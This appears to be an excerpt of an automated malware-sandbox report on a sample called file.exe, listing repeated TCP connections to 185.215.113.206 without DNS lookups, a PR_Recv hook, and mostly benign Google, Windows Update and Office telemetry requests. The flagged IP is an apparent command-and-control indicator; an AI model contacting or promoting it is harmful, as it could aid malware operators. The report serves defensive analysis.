Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6DCC60 PR_Recv,

0_2_6C6DCC60

Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=y+2aSXpCNotGH4M&MD=tMZ5WaH2 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=y+2aSXpCNotGH4M&MD=tMZ5WaH2 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
